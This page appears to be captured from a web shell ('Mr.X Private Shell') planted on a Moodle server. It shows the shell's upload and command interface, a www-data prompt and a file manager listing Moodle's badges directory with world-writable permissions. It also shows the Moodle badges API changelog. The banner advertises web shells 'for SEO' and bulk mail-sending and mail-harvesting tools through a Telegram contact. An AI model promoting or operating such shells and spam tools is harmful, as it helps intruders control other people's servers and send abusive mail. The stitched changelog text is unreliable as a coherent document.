__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
=== 4.5 Onwards ===

This file has been replaced by UPGRADING.md. See MDL-81125 for further information.

===
This files describes API changes in /badges/*,
information provided here is intended especially for developers.

=== 4.4 ===
* The following methods have been deprecated and now Report builder reports are used instead:
- render_badge_collection()
- render_badge_recipients()
* The following previously deprecated method has been removed and can no longer be used:
- `core_badges_renderer::print_badge_tabs`

=== 4.3 ===
* The following, deprecated since 3.11, have been removed and can no longer be used:
 - `badges/ajax.js`
 - `badges_check_backpack_accessibility`
 - `badges_setup_backpack_js`
 - `badges_local_backpack_js`
* Functions render_badge_management and print_badge_table_actions have been deprecated when converting the
section "Manage badges" to a Report Builder system report.

=== 4.0 ===
* Function print_badge_tabs has been deprecated in favour of manage_badge_action_bar instead

=== 3.11 ===
* $CFG->badges_site_backpack setting has been completely removed because it's not required anymore. From now, the primary
site backpack will be the first one in the "Manage backpacks" list (so, the one with lower sortorder value).
* Final deprecation for:
 - BADGE_BACKPACKURL constant has been removed.
 - badges/backpack.js file has been removed.
* The following methods have been deprecated:
 - badges_check_backpack_accessibility()
 - badges_setup_backpack_js()
 - badges_local_backpack_js()

=== 3.10 ===
* Users can now specify a backpack that differs from the site backpack. In order to do this, connection details need to
be set in 'Manage backpacks' with OR without auth details.
* Introduced new functions in backpack_api
** 'import_badge_assertion' to facilitate cross domain badge imports.
** 'update_assertion' updates a previously defined/created assertion.
* New badge lib functions introduced
** badges_save_external_backpack() - This method handles inserts/updates to the site wide backpacks' configuration details.
** badges_save_backpack_credentials() - This method handles inserts/updates any authentication details to connect to the backpacks created. This can either be site OR user backpack authentication details
** badges_get_user_backpack() - Gets a specific user's backpack. Defaults to current user's backpack if none provided.
** badges_get_site_primary_backpack() - Get the primary backpack set for the site as defined in $CFG->badges_site_backpack
* badges_open_badges_backpack_api() - Now accepts a backpackid(badge_external_backpack id) to check whether the version of the provided backpack.
  This was introduced because now there is a difference between a site and user backpack. If null, defaults to site_backpack.
* badges_get_site_backpack() - Accepts an additional $userid param if we want to get a specific user's backpack. Defaults to 0 if we are trying to get the site/admin level backpack
* badges_external_get_mapping() - Accepts an additional argument to indicate which value it wants returned. Defaults to 'externalid' which contains the OBv2 badge URL

=== 3.9 ===
* BADGE_BACKPACKAPIURL and BADGE_BACKPACKWEBURL are deprecated and should not be used.
* OBv2 has been set to the default value when the obversion is not defined.

=== 3.7 ===
* BADGE_BACKPACKURL is deprecated and should not be used.
* Incorrect term "badge competencies" has been refactored to "alignments" everywhere.

=== 3.6 ===

* The WebService core_badges_get_user_badges now returns more information for each badge: notification, nextcron, email, version, language, imageauthorname, imageauthoremail, imageauthorurl, imagecaption, endorsement, competencies and relatedbadges.

=== 2.7 ===

* get_completed_criteria_sql() - This method was added to award_criteria class and must be overriden
  in all criteria classes. This method returns an array consisting of SQL JOIN statement, WHERE conditions,
  and any parameters that might be required. The results are used in lib/badgeslib.php in review_all_criteria()
  to reduce to the minimum the number of users to review and award badges.
* New optional parameter $filtered in review() allows to indicate that some expensive checks can be skipped
  if the list of users has been initially filtered based on met criteria.
* New optional parameter $archive in delete() in badge class in badgeslib.php
  allows to indicate that a badge should be archived instead of fully deleted.
  If this parameter is set to FALSE, a badge will all its information, criteria,
  and awards will be removed from the database.
* BADGE_BACKPACKURL constant has been moved from badges/lib/backpacklib.php to lib/badgeslib.php, and URI scheme
  name ('http://') has been removed.

Filemanager

Name Type Size Permission Actions
amd Folder 0777
classes Folder 0777
criteria Folder 0777
lib Folder 0777
templates Folder 0777
tests Folder 0777
UPGRADING.md File 1.84 KB 0777
action.php File 2.68 KB 0777
alignment.php File 4.66 KB 0777
alignment_action.php File 1.54 KB 0777
alignment_form.php File 4.18 KB 0777
assertion.php File 2.54 KB 0777
award.php File 8.93 KB 0777
backpack-add.php File 6.96 KB 0777
backpack-connect.php File 2.38 KB 0777
backpack-export.php File 2.31 KB 0777
backpackemailverify.php File 3.63 KB 0777
backpacks.php File 3.68 KB 0777
badge.php File 3.29 KB 0777
badge_json.php File 5.07 KB 0777
badgeclass.php File 1.96 KB 0777
criteria.php File 3.73 KB 0777
criteria_action.php File 3.38 KB 0777
criteria_form.php File 3.97 KB 0777
criteria_settings.php File 4.81 KB 0777
edit.php File 6.6 KB 0777
endorsement.php File 3.86 KB 0777
endorsement_form.php File 4.16 KB 0777
endorsement_json.php File 2.52 KB 0777
external.php File 3.27 KB 0777
image_author_json.php File 1.79 KB 0777
index.php File 6.48 KB 0777
issuer_json.php File 1.78 KB 0777
lib.php File 4.93 KB 0777
mybackpack.php File 7.1 KB 0777
mybadges.php File 4 KB 0777
newbadge.php File 1.36 KB 0777
overview.php File 3.06 KB 0777
preferences.php File 2.09 KB 0777
preferences_form.php File 1.72 KB 0777
recipients.php File 2.91 KB 0777
related.php File 4.07 KB 0777
related_action.php File 1.54 KB 0777
related_form.php File 4.23 KB 0777
renderer.php File 49.09 KB 0777
upgrade.txt File 4.63 KB 0777
upgradelib.php File 1.71 KB 0777
view.php File 1.37 KB 0777
Filemanager